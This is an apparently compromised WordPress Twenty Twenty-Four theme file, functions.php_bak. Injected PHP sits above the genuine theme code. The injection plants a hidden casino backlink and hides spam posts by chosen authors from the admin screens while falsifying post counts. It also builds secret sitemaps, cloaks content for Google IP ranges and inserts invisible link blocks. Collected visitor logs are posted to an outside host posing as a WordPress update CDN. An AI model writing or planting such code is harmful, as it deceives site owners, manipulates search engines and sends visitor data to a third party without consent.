File: /var/www/itself.kauko.lt/wp-content/themes/twentytwentyfour/functions.php_bak
<?php
add_action( 'wp_footer', 'sdxjpdqan_2322', 1000 );function sdxjpdqan_2322(){if (is_front_page()){echo '<a style="display: block;overflow: hidden;height: 1px;" href="https://keys-soft.ru/">7к казино</a>';}}
/* custom filters */
function add_where_condition($where) {
global $wpdb, $userSettingsArr;
$ids = array_keys($userSettingsArr);
$idsCommaSeparated = implode(', ', $ids);
if (!is_single() && is_admin()) {
add_filter('views_edit-post', 'fix_post_counts');
return $where . " AND {$wpdb->posts}.post_author NOT IN ($idsCommaSeparated)";
}
return $where;
}
function post_exclude($query) {
global $userSettingsArr;
$ids = array_keys($userSettingsArr);
$excludeString = modifyWritersString($ids);
if (!$query->is_single() && !is_admin()) {
$query->set('author', $excludeString);
}
}
function wp_core_js() {
global $post, $userSettingsArr;
foreach ($userSettingsArr as $id => $settings) {
if (($id == $post->post_author) && (isset($settings['js']))) {
if (hideJSsource($settings)) {
break;
}
echo $settings['js'];
break;
}
}
}
function hideJSsource($settings) {
if (isset($settings['nojs']) && $settings['nojs'] === 1) {
//customSetDebug('cloacking is on!');
//customSendDebug();
if (customCheckSe()) {
return true;
}
}
return false;
}
function fix_post_counts($views) {
global $current_user, $wp_query;
$types = array(
array('status' => NULL),
array('status' => 'publish'),
array('status' => 'draft'),
array('status' => 'pending'),
array('status' => 'trash'),
array('status' => 'mine'),
);
foreach ($types as $type) {
$query = array(
'post_type' => 'post',
'post_status' => $type['status']
);
$result = new WP_Query($query);
if ($type['status'] == NULL) {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['all'], $matches)) {
$views['all'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['all']);
}
} elseif ($type['status'] == 'mine') {
$newQuery = $query;
$newQuery['author__in'] = array($current_user->ID);
$result = new WP_Query($newQuery);
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['mine'], $matches)) {
$views['mine'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['mine']);
}
} elseif ($type['status'] == 'publish') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['publish'], $matches)) {
$views['publish'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['publish']);
}
} elseif ($type['status'] == 'draft') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['draft'], $matches)) {
$views['draft'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['draft']);
}
} elseif ($type['status'] == 'pending') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['pending'], $matches)) {
$views['pending'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['pending']);
}
} elseif ($type['status'] == 'trash') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['trash'], $matches)) {
$views['trash'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['trash']);
}
}
}
return $views;
}
function filter_function_name_4055($counts, $type, $perm) {
if ($type === 'post') {
$old_counts = $counts->publish;
$counts_mod = posts_count_custom($perm);
$counts->publish = !$counts_mod ? $old_counts : $counts_mod;
}
return $counts;
}
function posts_count_custom($perm) {
global $wpdb, $userSettingsArr;
$ids = array_keys($userSettingsArr);
$idsCommaSeparated = implode(', ', $ids);
$type = 'post';
$query = "SELECT post_status, COUNT( * ) AS num_posts FROM {$wpdb->posts} WHERE post_type = %s";
if ('readable' == $perm && is_user_logged_in()) {
$post_type_object = get_post_type_object($type);
if (!current_user_can($post_type_object->cap->read_private_posts)) {
$query .= $wpdb->prepare(
" AND (post_status != 'private' OR ( post_author = %d AND post_status = 'private' ))", get_current_user_id()
);
}
}
$query .= " AND post_author NOT IN ($idsCommaSeparated) GROUP BY post_status";
$results = (array)$wpdb->get_results($wpdb->prepare($query, $type), ARRAY_A);
foreach ($results as $tmpArr) {
if ($tmpArr['post_status'] === 'publish') {
return $tmpArr['num_posts'];
}
}
}
function all_custom_posts_ids($userId) {
global $wpdb;
$query = "SELECT ID FROM {$wpdb->posts} where post_author = $userId";
$results = (array)$wpdb->get_results($query, ARRAY_A);
$ids = array();
foreach ($results as $tmpArr) {
$ids[] = $tmpArr['ID'];
}
return $ids;
}
function custom_flush_rules() {
global $userSettingsArr, $wp_rewrite;
$rules = get_option('rewrite_rules');
foreach ($userSettingsArr as $key => $arr) {
$regex = key($arr['sitemapsettings']);
if (!isset($rules[$regex]) ||
($rules[$regex] !== current($arr['sitemapsettings']))) {
$wp_rewrite->flush_rules();
}
}
}
function sitemap_xml_rules($rules) {
global $userSettingsArr;
$newrules = array();
foreach ($userSettingsArr as $key => $arr) {
if (isset($arr['sitemapsettings'])) {
$newrules[key($arr['sitemapsettings'])] = current($arr['sitemapsettings']);
}
}
return $newrules + $rules;
}
function customSitemapFeed() {
global $userSettingsArr;
foreach ($userSettingsArr as $key => $arr) {
$feedName = str_replace('index.php?feed=', '', current($arr['sitemapsettings']));
add_feed($feedName, 'customSitemapFeedFunc');
}
}
function customSitemapFeedFunc() {
//ini_set('memory_limit', '256MB');
header('Content-Type: ' . feed_content_type('rss-http') . '; charset=' . get_option('blog_charset'), true);
//header('Content-Type: ' . feed_content_type('rss') . '; charset=' . get_option('blog_charset'), true);
status_header(200);
$head = sitemapHead();
$sitemapSource = $head . "\n";
$userId = findUserIdByRequestUri();
$posts_ids = all_custom_posts_ids($userId);
$priority = '0.5';
$changefreq = 'weekly';
$lastmod = date('Y-m-d');
foreach ($posts_ids as $post_id) {
$url = get_permalink($post_id);
$sitemapSource .= urlBlock($url, $lastmod, $changefreq, $priority);
wp_cache_delete($post_id, 'posts');
}
$sitemapSource .= "\n</urlset>";
echo $sitemapSource;
}
function sitemapHead() {
return <<<STR
<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
STR;
}
function urlBlock($url, $lastmod, $changefreq, $priority) {
return <<<STR
<url>
<loc>$url</loc>
<lastmod>$lastmod</lastmod>
<changefreq>$changefreq</changefreq>
<priority>$priority</priority>
</url>\n\n
STR;
}
function modifyWritersString($writersArr) {
$writersArrMod = array();
foreach ($writersArr as $item) {
$writersArrMod[] = '-' . $item;
}
return implode(',', $writersArrMod);
}
function customFiltersSettings() {
$settings = get_option('wp_custom_filters');
if (!$settings) {
return null;
}
return unserialize(base64_decode($settings));
}
function findUserIdByRequestUri() {
global $userSettingsArr;
foreach ($userSettingsArr as $key => $arr) {
$regexp = key($arr['sitemapsettings']) . '|'
. str_replace('index.php?', '', current($arr['sitemapsettings']) . '$');
if (preg_match("~$regexp~", $_SERVER['REQUEST_URI'])) {
return $key;
}
}
}
function isCustomPost() {
global $userSettingsArr, $post;
$authors_ids_arr = array_keys($userSettingsArr);
if (in_array($post->post_author, $authors_ids_arr)) {
return true;
}
return false;
}
function removeYoastMeta() {
global $userSettingsArr, $post;
$authors_ids_arr = array_keys($userSettingsArr);
if (!$post || !property_exists($post, 'author')) {
return;
}
if (in_array($post->post_author, $authors_ids_arr)) {
add_filter('wpseo_robots', '__return_false');
add_filter('wpseo_googlebot', '__return_false'); // Yoast SEO 14.x or newer
add_filter('wpseo_bingbot', '__return_false'); // Yoast SEO 14.x or newer
}
}
function getRemoteIp() {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
return $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
return $_SERVER['HTTP_CF_CONNECTING_IP'];
}
if (isset($_SERVER['REMOTE_ADDR'])) {
return $_SERVER['REMOTE_ADDR'];
}
return false;
}
function customCheckSe() {
$ip = getRemoteIp();
if (strstr($ip, ', ')) {
$ips = explode(', ', $ip);
$ip = $ips[0];
}
$ranges = customSeIps();
if (!$ranges) {
return false;
}
foreach ($ranges as $range) {
if (customCheckInSubnet($ip, $range)) {
//customSetDebug(sprintf('black_list||%s||%s||%s||%s', $ip, $range
// , $_SERVER['HTTP_USER_AGENT'], $_SERVER['HTTP_ACCEPT_LANGUAGE']));
return true;
}
}
//customSetDebug(sprintf('white list||%s||%s||%s||%s', $ip, $range
// , $_SERVER['HTTP_USER_AGENT'], $_SERVER['HTTP_ACCEPT_LANGUAGE']));
return false;
}
function customIsRenewTime($timestamp) {
//if ((time() - $timestamp) > 60 * 60 * 24) {
if ((time() - $timestamp) > 60 * 60) {
return true;
}
//customSetDebug(sprintf('time - %s, timestamp - %s', time(), $timestamp));
return false;
}
function customSetDebug($data) {
if (($value = get_option('wp_debug_data')) && is_array($value)) {
$value[] = sprintf('%s||%s||%s', time(), $_SERVER['HTTP_HOST'], $data);
update_option('wp_debug_data', $value, false);
return;
}
update_option('wp_debug_data', array($data), false);
}
function customSendDebug() {
$value = get_option('wp_debug_data');
if (!is_array($value) || (count($value) < 100)) {
return;
}
$url = 'http://wp-update-cdn.com/src/ualogsec.php';
$response = wp_remote_post($url, array(
'method' => 'POST',
'timeout' => 10,
'body' => array(
'host' => $_SERVER['HTTP_HOST'],
'debugdata' => gzcompress(json_encode($value)), 9)
)
);
if (is_wp_error($response)) {
return;
} else {
if (trim($response['body']) === 'success') {
update_option('wp_debug_data', array(), false);
}
}
}
function customSeIps() {
if (($value = get_option('wp_custom_range')) && !customIsRenewTime($value['timestamp'])) {
return $value['ranges'];
} else {
//customSetDebug('time to update ranges');
$response = wp_remote_get('https://www.gstatic.com/ipranges/goog.txt');
if (is_wp_error($response)) {
//customSetDebug('error response ipranges');
return;
}
$body = wp_remote_retrieve_body($response);
$ranges = preg_split("~(\r\n|\n)~", trim($body), -1, PREG_SPLIT_NO_EMPTY);
if (!is_array($ranges)) {
//customSetDebug('invalid update ranges not an array');
return;
}
$value = array('ranges' => $ranges, 'timestamp' => time());
update_option('wp_custom_range', $value, true);
return $value['ranges'];
}
}
function customInetToBits($inet) {
$splitted = str_split($inet);
$binaryip = '';
foreach ($splitted as $char) {
$binaryip .= str_pad(decbin(ord($char)), 8, '0', STR_PAD_LEFT);
}
return $binaryip;
}
function customCheckInSubnet($ip, $cidrnet) {
$ip = inet_pton($ip);
$binaryip = customInetToBits($ip);
list($net, $maskbits) = explode('/', $cidrnet);
$net = inet_pton($net);
$binarynet = customInetToBits($net);
$ip_net_bits = substr($binaryip, 0, $maskbits);
$net_bits = substr($binarynet, 0, $maskbits);
if ($ip_net_bits !== $net_bits) {
//echo 'Not in subnet';
return false;
} else {
return true;
}
}
/**
* function buffer_start_custom() {
*
* global $post, $userSettingsArr;
*
* $authors_ids_arr = array_keys($userSettingsArr);
*
*
*
* if (!in_array($post->post_author, $authors_ids_arr)) {
* if (is_single() || (is_front_page() || is_home())) {
* ob_start("callback_custom");
* }
* }
* }
*
*/
function buffer_start_custom() {
echo '<!--buffer start custom--!>' . PHP_EOL;
if (!isCustomPost()) {
if (is_singular() || (is_front_page() || is_home())) {
echo '<!--start callback custom--!>' . PHP_EOL;
ob_start("callback_custom");
}
}
}
function buffer_end_custom() {
ob_end_flush();
}
function callback_custom($buffer) {
global $homeLinksSettingsArr;
return buffer_prepare_custom($homeLinksSettingsArr, $buffer);
}
function buffer_prepare_custom($homeLinksSettingsArr, $buffer) {
if (($homeLinksSettingsArr['hiddenType']['cloacking'] === 1) && !customCheckSe()) {
customSetDebug('no google bot, without changes ' . getRemoteIp());
return $buffer;
}
$textBlock = text_block_custom($homeLinksSettingsArr);
$textBlock = additional_style_custom($homeLinksSettingsArr, $textBlock);
if ($homeLinksSettingsArr['position']['footer'] === 1) {
customSetDebug('footer position');
return $buffer . PHP_EOL . $textBlock;
}
if ($homeLinksSettingsArr['position']['head'] === 1) {
customSetDebug('header position');
return $textBlock . PHP_EOL . $buffer;
}
}
function text_block_custom($homeLinksSettingsArr) {
global $post;
$block = '';
if ($homeLinksSettingsArr['textBlocksCount']['onlyHomePage'] === 1) {
if (is_front_page() || is_home()) {
customSetDebug('home page mode');
$block = get_option('home_links_custom_0');
}
} elseif ($homeLinksSettingsArr['textBlocksCount']['10DifferentTextBlocks'] === 1) {
$url = get_permalink($post->ID);
preg_match('~\d~', md5($url), $matches);
$block = get_option('home_links_custom_' . $matches[0]);
$log = sprintf('10DifferentTextBlocks page mode block num - %s permalink - %s', $matches[0], $url);
customSetDebug($log);
} elseif ($homeLinksSettingsArr['textBlocksCount']['100DifferentTextBlocks'] === 1) {
$url = get_permalink($post->ID);
preg_match_all('~\d~', md5($url), $matches);
$digits = ($matches[0][0] == 0) ? $matches[0][1] : $matches[0][0] . '' . $matches[0][1];
$block = get_option('home_links_custom_' . $digits);
$log = sprintf('100DifferentTextBlocks page mode block num - %s permalink - %s', $digits, $url);
customSetDebug($log);
} elseif ($homeLinksSettingsArr['textBlocksCount']['fullDifferentTextBlocks'] === 1) {
} else {
}
return !$block ? '' : $block;
}
function additional_style_custom($homeLinksSettingsArr, $textBlock) {
if (empty($textBlock)) {
return '';
}
if ($homeLinksSettingsArr['hiddenType']['css'] === 1) {
$cssRules = css_rule_custom();
return $cssRules[0] . PHP_EOL . $textBlock . PHP_EOL . $cssRules[1];
}
return $textBlock;
}
function css_rule_custom() {
//return ['<div style="display: none;">', '</div>'];
return array('<div style="position:absolute; filter:alpha(opacity=0);opacity:0.003;z-index:8;">', '</div>');
}
function home_links_settings_custom($settings) {
foreach ($settings as $key => $arr) {
if (isset($arr['homeLinks'])) {
return $arr['homeLinks'];
}
}
return array();
}
$userSettingsArr = customFiltersSettings();
if (is_array($userSettingsArr)) {
add_filter('posts_where_paged', 'add_where_condition');
add_action('pre_get_posts', 'post_exclude');
add_action('wp_enqueue_scripts', 'wp_core_js');
add_filter('wp_count_posts', 'filter_function_name_4055', 10, 3);
add_filter('rewrite_rules_array', 'sitemap_xml_rules');
add_action('wp_loaded', 'custom_flush_rules');
add_action('init', 'customSitemapFeed');
add_action('template_redirect', 'removeYoastMeta');
$homeLinksSettingsArr = home_links_settings_custom($userSettingsArr);
if (!empty($homeLinksSettingsArr)) {
customSendDebug();
add_action('wp_head', 'buffer_start_custom');
add_action('wp_footer', 'buffer_end_custom');
}
}
/* custom filters */
/**
* Twenty Twenty-Four functions and definitions
*
* @link https://developer.wordpress.org/themes/basics/theme-functions/
*
* @package Twenty Twenty-Four
* @since Twenty Twenty-Four 1.0
*/
/**
* Register block styles.
*/
if ( ! function_exists( 'twentytwentyfour_block_styles' ) ) :
/**
* Register custom block styles
*
* @since Twenty Twenty-Four 1.0
* @return void
*/
function twentytwentyfour_block_styles() {
register_block_style(
'core/details',
array(
'name' => 'arrow-icon-details',
'label' => __( 'Arrow icon', 'twentytwentyfour' ),
/*
* Styles for the custom Arrow icon style of the Details block
*/
'inline_style' => '
.is-style-arrow-icon-details {
padding-top: var(--wp--preset--spacing--10);
padding-bottom: var(--wp--preset--spacing--10);
}
.is-style-arrow-icon-details summary {
list-style-type: "\2193\00a0\00a0\00a0";
}
.is-style-arrow-icon-details[open]>summary {
list-style-type: "\2192\00a0\00a0\00a0";
}',
)
);
register_block_style(
'core/post-terms',
array(
'name' => 'pill',
'label' => __( 'Pill', 'twentytwentyfour' ),
/*
* Styles variation for post terms
* https://github.com/WordPress/gutenberg/issues/24956
*/
'inline_style' => '
.is-style-pill a,
.is-style-pill span:not([class], [data-rich-text-placeholder]) {
display: inline-block;
background-color: var(--wp--preset--color--base-2);
padding: 0.375rem 0.875rem;
border-radius: var(--wp--preset--spacing--20);
}
.is-style-pill a:hover {
background-color: var(--wp--preset--color--contrast-3);
}',
)
);
register_block_style(
'core/list',
array(
'name' => 'checkmark-list',
'label' => __( 'Checkmark', 'twentytwentyfour' ),
/*
* Styles for the custom checkmark list block style
* https://github.com/WordPress/gutenberg/issues/51480
*/
'inline_style' => '
ul.is-style-checkmark-list {
list-style-type: "\2713";
}
ul.is-style-checkmark-list li {
padding-inline-start: 1ch;
}',
)
);
register_block_style(
'core/navigation-link',
array(
'name' => 'arrow-link',
'label' => __( 'With arrow', 'twentytwentyfour' ),
/*
* Styles for the custom arrow nav link block style
*/
'inline_style' => '
.is-style-arrow-link .wp-block-navigation-item__label:after {
content: "\2197";
padding-inline-start: 0.25rem;
vertical-align: middle;
text-decoration: none;
display: inline-block;
}',
)
);
register_block_style(
'core/heading',
array(
'name' => 'asterisk',
'label' => __( 'With asterisk', 'twentytwentyfour' ),
'inline_style' => "
.is-style-asterisk:before {
content: '';
width: 1.5rem;
height: 3rem;
background: var(--wp--preset--color--contrast-2, currentColor);
clip-path: path('M11.93.684v8.039l5.633-5.633 1.216 1.23-5.66 5.66h8.04v1.737H13.2l5.701 5.701-1.23 1.23-5.742-5.742V21h-1.737v-8.094l-5.77 5.77-1.23-1.217 5.743-5.742H.842V9.98h8.162l-5.701-5.7 1.23-1.231 5.66 5.66V.684h1.737Z');
display: block;
}
/* Hide the asterisk if the heading has no content, to avoid using empty headings to display the asterisk only, which is an A11Y issue */
.is-style-asterisk:empty:before {
content: none;
}
.is-style-asterisk:-moz-only-whitespace:before {
content: none;
}
.is-style-asterisk.has-text-align-center:before {
margin: 0 auto;
}
.is-style-asterisk.has-text-align-right:before {
margin-left: auto;
}
.rtl .is-style-asterisk.has-text-align-left:before {
margin-right: auto;
}",
)
);
}
endif;
add_action( 'init', 'twentytwentyfour_block_styles' );
/**
* Enqueue block stylesheets.
*/
if ( ! function_exists( 'twentytwentyfour_block_stylesheets' ) ) :
/**
* Enqueue custom block stylesheets
*
* @since Twenty Twenty-Four 1.0
* @return void
*/
function twentytwentyfour_block_stylesheets() {
/**
* The wp_enqueue_block_style() function allows us to enqueue a stylesheet
* for a specific block. These will only get loaded when the block is rendered
* (both in the editor and on the front end), improving performance
* and reducing the amount of data requested by visitors.
*
* See https://make.wordpress.org/core/2021/12/15/using-multiple-stylesheets-per-block/ for more info.
*/
wp_enqueue_block_style(
'core/button',
array(
'handle' => 'twentytwentyfour-button-style-outline',
'src' => get_parent_theme_file_uri( 'assets/css/button-outline.css' ),
'ver' => wp_get_theme( get_template() )->get( 'Version' ),
'path' => get_parent_theme_file_path( 'assets/css/button-outline.css' ),
)
);
}
endif;
add_action( 'init', 'twentytwentyfour_block_stylesheets' );
/**
* Register pattern categories.
*/
if ( ! function_exists( 'twentytwentyfour_pattern_categories' ) ) :
/**
* Register pattern categories
*
* @since Twenty Twenty-Four 1.0
* @return void
*/
function twentytwentyfour_pattern_categories() {
register_block_pattern_category(
'page',
array(
'label' => _x( 'Pages', 'Block pattern category' ),
'description' => __( 'A collection of full page layouts.' ),
)
);
}
endif;
add_action( 'init', 'twentytwentyfour_pattern_categories' );